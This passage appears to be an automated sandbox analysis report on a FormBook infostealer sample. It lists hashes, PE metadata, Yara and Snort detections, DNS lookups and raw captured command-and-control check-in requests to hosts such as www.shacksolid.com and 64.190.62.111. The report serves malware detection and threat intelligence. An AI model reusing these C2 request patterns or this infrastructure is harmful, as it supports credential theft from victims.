                                                                    DUE PAYMENT.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    x86_64Get hashmaliciousBrowse
                                                                    • 209.87.95.109
                                                                    DUE INVOICES.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    04_extracted.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    Order.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    Statement of Account.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    USD INV#1191189.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    NEW_PO_QUOTE_88987_PDF.exeGet hashmaliciousBrowse
                                                                    • 64.190.62.111
                                                                    CLOUDFLARENETUSqbrMYaTNrE.exeGet hashmaliciousBrowse
                                                                    • 104.21.26.237
                                                                    M12s7KNFDg.exeGet hashmaliciousBrowse
                                                                    • 172.67.168.153
                                                                    farcry6_repack.exeGet hashmaliciousBrowse
                                                                    • 162.159.130.233
                                                                    Original Shipment Doc Ref 2853801324189923,PDF.exeGet hashmaliciousBrowse
                                                                    • 162.159.134.233
                                                                    Gsdqz.dllGet hashmaliciousBrowse
                                                                    • 104.26.6.139
                                                                    4tOOUNDwaW.exeGet hashmaliciousBrowse
                                                                    • 172.67.168.153
                                                                    7ofFMoirr5.exeGet hashmaliciousBrowse
                                                                    • 104.21.26.237
                                                                    HUTWMrDhov.dllGet hashmaliciousBrowse
                                                                    • 104.26.7.139
                                                                    2u2u8wnrrW.exeGet hashmaliciousBrowse
                                                                    • 172.67.216.2
                                                                    z8FnqbFMkV.exeGet hashmaliciousBrowse
                                                                    • 172.67.168.153
                                                                    divpCHa0h7.exeGet hashmaliciousBrowse
                                                                    • 23.227.38.74
                                                                    M1YceQ237E.dllGet hashmaliciousBrowse
                                                                    • 104.20.185.68
                                                                    BF2042.exeGet hashmaliciousBrowse
                                                                    • 162.159.134.233
                                                                    SecuriteInfo.com.W32.AIDetect.malware1.10225.exeGet hashmaliciousBrowse
                                                                    • 104.21.26.237
                                                                    5y4jNIVnk2.exeGet hashmaliciousBrowse
                                                                    • 104.21.26.237
                                                                    vlF8tRNmtw.exeGet hashmaliciousBrowse
                                                                    • 172.67.173.58
                                                                    FTdhc25gn8.exeGet hashmaliciousBrowse
                                                                    • 162.159.130.233
                                                                    Paymentslip 10132021.xlsxGet hashmaliciousBrowse
                                                                    • 172.67.188.154
                                                                    UZlg2Sq2pQ.exeGet hashmaliciousBrowse
                                                                    • 104.21.17.130
                                                                    Revised_Purchase_Order.htmGet hashmaliciousBrowse
                                                                    • 172.67.219.206

                                                                    JA3 Fingerprints

                                                                    No context

                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fu94e0b1TR.exe.log
                                                                    Process:C:\Users\user\Desktop\Fu94e0b1TR.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1308
                                                                    Entropy (8bit):5.348115897127242
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLUE4KJXE4qpE4Ks2E1qE4qpAE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x88:MIHKtH2HKXE1qHmAHKzvRYHKhQnoPtH2
                                                                    MD5:832D6A22CE7798D72609B9C21B4AF152
                                                                    SHA1:B086DE927BFEE6039F5555CE53C397D1E59B4CA4
                                                                    SHA-256:9E5EE72EF293C66406AF155572BF3B0CF9DA09CC1F60ED6524AAFD65553CE551
                                                                    SHA-512:A1A70F76B98C2478830AE737B4F12507D859365F046C5A415E1EBE3D87FFD2B64663A31E1E5142F7C3A7FE9A6A9CB8C143C2E16E94C3DD6041D1CCABEDDD2C21
                                                                    Malicious:false
                                                                    Reputation:moderate, very likely benign file
                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):7.47098319943845
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    File name:Fu94e0b1TR.exe
                                                                    File size:474112
                                                                    MD5:6429aa83e4bc083b4f0b3f44b0d7950f
                                                                    SHA1:0ead59881f054284f611accb61451ed1ffc818fc
                                                                    SHA256:96c57ae661562e958e01bb0b490c09a0a51bb367931620223174963de88bdfcb
                                                                    SHA512:186383701c591db2c011c8ae24920759c10880068dd217e32110ae54b9c7f0863b7fb04e893f601a234742deb5838a22820dc8835ba9198d66b7bb297d502f9b
                                                                    SSDEEP:6144:zMkhBsNolyfnZle9UX08PF85KQ4O1LkyUCZ2e12XZ0bp2Qo7lYB:oSBblyfnZlW+08+5KQpyy52nZ0vo7a
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa..............0.................. ........@.. ....................................@................................

                                                                    File Icon

                                                                    Icon Hash:c4b28ed696aa92c0

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x45c99e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x6166A519 [Wed Oct 13 09:21:29 2021 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5c94c0x4f.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x5e0000x18c94.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x780000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x5a9a40x5aa00False0.880191271552data7.77320879492IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x5e0000x18c940x18e00False0.1953125data5.07036789646IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x780000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_ICON0x5e1800x468GLS_BINARY_LSB_FIRST
                                                                    RT_ICON0x5e5f80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                                    RT_ICON0x5f6b00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                    RT_ICON0x61c680x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                    RT_ICON0x65ea00x10828dBase III DBT, version number 0, next free block index 40
                                                                    RT_GROUP_ICON0x766d80x4cdata
                                                                    RT_VERSION0x767340x360data
                                                                    RT_MANIFEST0x76aa40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Version Infos

                                                                    DescriptionData
                                                                    Translation0x0000 0x04b0
                                                                    LegalCopyrightCopyright Gottschalks 2011
                                                                    Assembly Version1.0.0.0
                                                                    InternalNameObjectMarshal.exe
                                                                    FileVersion1.0.0.0
                                                                    CompanyNameGottschalks
                                                                    LegalTrademarks
                                                                    Comments
                                                                    ProductNameMapEditor1
                                                                    ProductVersion1.0.0.0
                                                                    FileDescriptionMapEditor1
                                                                    OriginalFilenameObjectMarshal.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    10/13/21-20:59:09.555144TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.564.190.62.111
                                                                    10/13/21-20:59:09.555144TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.564.190.62.111
                                                                    10/13/21-20:59:09.555144TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.564.190.62.111
                                                                    10/13/21-20:59:19.990837TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979780192.168.2.5192.0.78.24
                                                                    10/13/21-20:59:19.990837TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979780192.168.2.5192.0.78.24
                                                                    10/13/21-20:59:19.990837TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979780192.168.2.5192.0.78.24

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 13, 2021 20:58:54.041382074 CEST4979080192.168.2.5172.65.227.72
                                                                    Oct 13, 2021 20:58:54.057359934 CEST8049790172.65.227.72192.168.2.5
                                                                    Oct 13, 2021 20:58:54.065212965 CEST4979080192.168.2.5172.65.227.72
                                                                    Oct 13, 2021 20:58:54.065588951 CEST4979080192.168.2.5172.65.227.72
                                                                    Oct 13, 2021 20:58:54.082298040 CEST8049790172.65.227.72192.168.2.5
                                                                    Oct 13, 2021 20:58:54.380971909 CEST8049790172.65.227.72192.168.2.5
                                                                    Oct 13, 2021 20:58:54.380996943 CEST8049790172.65.227.72192.168.2.5
                                                                    Oct 13, 2021 20:58:54.381203890 CEST4979080192.168.2.5172.65.227.72
                                                                    Oct 13, 2021 20:58:54.381292105 CEST4979080192.168.2.5172.65.227.72
                                                                    Oct 13, 2021 20:58:54.397142887 CEST8049790172.65.227.72192.168.2.5
                                                                    Oct 13, 2021 20:59:09.536864042 CEST4979580192.168.2.564.190.62.111
                                                                    Oct 13, 2021 20:59:09.554685116 CEST804979564.190.62.111192.168.2.5
                                                                    Oct 13, 2021 20:59:09.554913998 CEST4979580192.168.2.564.190.62.111
                                                                    Oct 13, 2021 20:59:09.555144072 CEST4979580192.168.2.564.190.62.111
                                                                    Oct 13, 2021 20:59:09.572714090 CEST804979564.190.62.111192.168.2.5
                                                                    Oct 13, 2021 20:59:09.598285913 CEST804979564.190.62.111192.168.2.5
                                                                    Oct 13, 2021 20:59:09.598323107 CEST804979564.190.62.111192.168.2.5
                                                                    Oct 13, 2021 20:59:09.598609924 CEST4979580192.168.2.564.190.62.111
                                                                    Oct 13, 2021 20:59:09.598695040 CEST4979580192.168.2.564.190.62.111
                                                                    Oct 13, 2021 20:59:09.616345882 CEST804979564.190.62.111192.168.2.5

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 13, 2021 20:58:54.008306980 CEST5244153192.168.2.58.8.8.8
                                                                    Oct 13, 2021 20:58:54.033735037 CEST53524418.8.8.8192.168.2.5
                                                                    Oct 13, 2021 20:58:59.395916939 CEST6529653192.168.2.58.8.8.8
                                                                    Oct 13, 2021 20:58:59.421633959 CEST53652968.8.8.8192.168.2.5
                                                                    Oct 13, 2021 20:59:04.443331003 CEST6318353192.168.2.58.8.8.8
                                                                    Oct 13, 2021 20:59:04.465982914 CEST53631838.8.8.8192.168.2.5
                                                                    Oct 13, 2021 20:59:09.501405954 CEST6015153192.168.2.58.8.8.8
                                                                    Oct 13, 2021 20:59:09.534939051 CEST53601518.8.8.8192.168.2.5
                                                                    Oct 13, 2021 20:59:14.611547947 CEST5696953192.168.2.58.8.8.8
                                                                    Oct 13, 2021 20:59:14.630974054 CEST53569698.8.8.8192.168.2.5
                                                                    Oct 13, 2021 20:59:19.956043005 CEST5516153192.168.2.58.8.8.8
                                                                    Oct 13, 2021 20:59:19.974540949 CEST53551618.8.8.8192.168.2.5

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Oct 13, 2021 20:58:54.008306980 CEST192.168.2.58.8.8.80x3f12Standard query (0)www.apricitee.comA (IP address)IN (0x0001)
                                                                    Oct 13, 2021 20:58:59.395916939 CEST192.168.2.58.8.8.80xc785Standard query (0)www.instatechnovelz.comA (IP address)IN (0x0001)
                                                                    Oct 13, 2021 20:59:04.443331003 CEST192.168.2.58.8.8.80xcda9Standard query (0)www.brondairy.comA (IP address)IN (0x0001)
                                                                    Oct 13, 2021 20:59:09.501405954 CEST192.168.2.58.8.8.80x377aStandard query (0)www.shacksolid.comA (IP address)IN (0x0001)
                                                                    Oct 13, 2021 20:59:14.611547947 CEST192.168.2.58.8.8.80x698bStandard query (0)www.rjtherealest.comA (IP address)IN (0x0001)
                                                                    Oct 13, 2021 20:59:19.956043005 CEST192.168.2.58.8.8.80x449dStandard query (0)www.fis.photosA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Oct 13, 2021 20:58:54.033735037 CEST8.8.8.8192.168.2.50x3f12No error (0)www.apricitee.comvip.shoplazza.storeCNAME (Canonical name)IN (0x0001)
                                                                    Oct 13, 2021 20:58:54.033735037 CEST8.8.8.8192.168.2.50x3f12No error (0)vip.shoplazza.storefbc7888164e64afca05b80bb89630439.pacloudflare.comCNAME (Canonical name)IN (0x0001)
                                                                    Oct 13, 2021 20:58:54.033735037 CEST8.8.8.8192.168.2.50x3f12No error (0)fbc7888164e64afca05b80bb89630439.pacloudflare.com172.65.227.72A (IP address)IN (0x0001)
                                                                    Oct 13, 2021 20:58:59.421633959 CEST8.8.8.8192.168.2.50xc785Name error (3)www.instatechnovelz.comnonenoneA (IP address)IN (0x0001)
                                                                    Oct 13, 2021 20:59:04.465982914 CEST8.8.8.8192.168.2.50xcda9Name error (3)www.brondairy.comnonenoneA (IP address)IN (0x0001)
                                                                    Oct 13, 2021 20:59:09.534939051 CEST8.8.8.8192.168.2.50x377aNo error (0)www.shacksolid.com64.190.62.111A (IP address)IN (0x0001)
                                                                    Oct 13, 2021 20:59:14.630974054 CEST8.8.8.8192.168.2.50x698bNo error (0)www.rjtherealest.com74.208.236.145A (IP address)IN (0x0001)
                                                                    Oct 13, 2021 20:59:19.974540949 CEST8.8.8.8192.168.2.50x449dNo error (0)www.fis.photosfis.photosCNAME (Canonical name)IN (0x0001)
                                                                    Oct 13, 2021 20:59:19.974540949 CEST8.8.8.8192.168.2.50x449dNo error (0)fis.photos192.0.78.24A (IP address)IN (0x0001)
                                                                    Oct 13, 2021 20:59:19.974540949 CEST8.8.8.8192.168.2.50x449dNo error (0)fis.photos192.0.78.25A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • www.apricitee.com
                                                                    • www.shacksolid.com

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.549790172.65.227.7280C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 13, 2021 20:58:54.065588951 CEST6908OUTGET /ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC HTTP/1.1
                                                                    Host: www.apricitee.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Oct 13, 2021 20:58:54.380971909 CEST6909INHTTP/1.1 301 Moved Permanently
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Location: https://www.apricitee.com/ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC
                                                                    Strict-Transport-Security: max-age=315360000; includeSubdomains
                                                                    X-Content-Type-Options: nosniff
                                                                    X-Download-Options: noopen
                                                                    X-Xss-Protection: 1; mode=block
                                                                    Date: Wed, 13 Oct 2021 18:58:54 GMT
                                                                    Content-Length: 159
                                                                    Connection: close
                                                                    Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 70 72 69 63 69 74 65 65 2e 63 6f 6d 2f 65 66 36 63 2f 3f 42 4a 42 3d 37 6e 4f 38 30 44 26 61 6d 70 3b 79 72 54 6c 67 6c 76 38 3d 4b 53 48 4e 2f 37 32 44 45 4a 50 79 64 2f 4f 75 47 4f 49 58 4e 46 42 53 5a 6f 4f 68 5a 53 53 71 63 5a 50 31 52 71 63 32 62 67 38 4b 45 50 73 58 4c 5a 64 50 73 51 4b 2b 48 6c 73 58 6e 33 4a 70 31 50 61 43 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                    Data Ascii: <a href="https://www.apricitee.com/ef6c/?BJB=7nO80D&amp;yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC">Moved Permanently</a>.


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.54979564.190.62.11180C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 13, 2021 20:59:09.555144072 CEST6931OUTGET /ef6c/?yrTlglv8=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r&BJB=7nO80D HTTP/1.1
                                                                    Host: www.shacksolid.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
                                                                    Oct 13, 2021 20:59:09.598285913 CEST6932INHTTP/1.1 302 Found
                                                                    date: Wed, 13 Oct 2021 18:59:09 GMT
                                                                    content-type: text/html; charset=UTF-8
                                                                    content-length: 0
                                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_D3MXYL1dze6qe7cOwJ2xLuV/g0A+RCNznrrC7wxtyCM8qdSMYKIxkg1u6Sue7w2UedwCteHB8MdfRzHrGBDLoQ==
                                                                    expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                    cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    pragma: no-cache
                                                                    last-modified: Wed, 13 Oct 2021 18:59:09 GMT
                                                                    location: https://sedo.com/search/details/?partnerid=324561&language=e&domain=shacksolid.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                                    x-cache-miss-from: parking-f666569bc-whw7l
                                                                    server: NginX
                                                                    connection: close


                                                                    Code Manipulations

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    Analysis Process: Fu94e0b1TR.exe PID: 4628 Parent PID: 6048

                                                                    General

                                                                    Start time:20:57:09
                                                                    Start date:13/10/2021
                                                                    Path:C:\Users\user\Desktop\Fu94e0b1TR.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\Fu94e0b1TR.exe'
                                                                    Imagebase:0x6d0000
                                                                    File size:474112 bytes
                                                                    MD5 hash:6429AA83E4BC083B4F0B3F44B0D7950F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: Fu94e0b1TR.exe PID: 4840 Parent PID: 4628

                                                                    General

                                                                    Start time:20:57:22
                                                                    Start date:13/10/2021
                                                                    Path:C:\Users\user\Desktop\Fu94e0b1TR.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\Desktop\Fu94e0b1TR.exe
                                                                    Imagebase:0x350000
                                                                    File size:474112 bytes
                                                                    MD5 hash:6429AA83E4BC083B4F0B3F44B0D7950F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: Fu94e0b1TR.exe PID: 2848 Parent PID: 4628

                                                                    General

                                                                    Start time:20:57:23
                                                                    Start date:13/10/2021
                                                                    Path:C:\Users\user\Desktop\Fu94e0b1TR.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\Fu94e0b1TR.exe
                                                                    Imagebase:0x610000
                                                                    File size:474112 bytes
                                                                    MD5 hash:6429AA83E4BC083B4F0B3F44B0D7950F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: explorer.exe PID: 3472 Parent PID: 2848

                                                                    General

                                                                    Start time:20:57:25
                                                                    Start date:13/10/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                    Imagebase:0x7ff693d90000
                                                                    File size:3933184 bytes
